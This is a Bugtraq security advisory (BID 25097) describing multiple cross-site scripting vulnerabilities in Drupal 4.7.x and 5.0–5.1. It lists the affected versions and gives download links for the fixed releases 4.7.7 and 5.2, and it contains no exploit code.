Drupal Multiple Cross-Site Scripting Vulnerabilities
BID:25097
Info
Drupal Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 25097 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2007 12:00AM |
| Updated: | Jul 31 2007 12:25AM |
| Credit: | David Caylor and Karthik are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Drupal Drupal 4.7.6 Drupal Drupal 4.7.5 Drupal Drupal 4.7.4 Drupal Drupal 4.7.4 Drupal Drupal 4.7.3 Drupal Drupal 4.7.3 Drupal Drupal 4.7.2 Drupal Drupal 4.7.1 Drupal Drupal 4.7 Drupal Drupal 5.1 revision 1.1 Drupal Drupal 5.1 Drupal Drupal 5.0 |
| Not Vulnerable: |
Drupal Drupal 4.7.7 Drupal Drupal 5.2 |
Discussion
Drupal Multiple Cross-Site Scripting Vulnerabilities
Drupal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Drupal 4.7.7 and prior to Drupal 5.2 are vulnerable to these issues.
Drupal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Drupal 4.7.7 and prior to Drupal 5.2 are vulnerable to these issues.
Exploit / POC
Drupal Multiple Cross-Site Scripting Vulnerabilities
Attackers can exploit these issues to trick a user into visiting a malicious site.
Attackers can exploit these issues to trick a user into visiting a malicious site.
Solution / Fix
Drupal Multiple Cross-Site Scripting Vulnerabilities
Solution:
The vendor has released Drupal 4.7.7 and Drupal 5.2 to address these issues. Please see the references for more information.
Drupal Drupal 5.1
Drupal Drupal 5.0
Drupal Drupal 4.7
Drupal Drupal 4.7.1
Drupal Drupal 4.7.2
Drupal Drupal 4.7.3
Drupal Drupal 4.7.3
Drupal Drupal 4.7.4
Drupal Drupal 4.7.4
Drupal Drupal 4.7.5
Drupal Drupal 4.7.6
Solution:
The vendor has released Drupal 4.7.7 and Drupal 5.2 to address these issues. Please see the references for more information.
Drupal Drupal 5.1
-
Drupal drupal-5.2.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-5.2.tar.gz
Drupal Drupal 5.0
-
Drupal drupal-5.2.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-5.2.tar.gz
Drupal Drupal 4.7
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.1
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.2
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.3
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.3
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.4
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.4
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.5
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
Drupal Drupal 4.7.6
-
Drupal drupal-4.7.7.tar.gz
http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
References
Drupal Multiple Cross-Site Scripting Vulnerabilities
References:
References: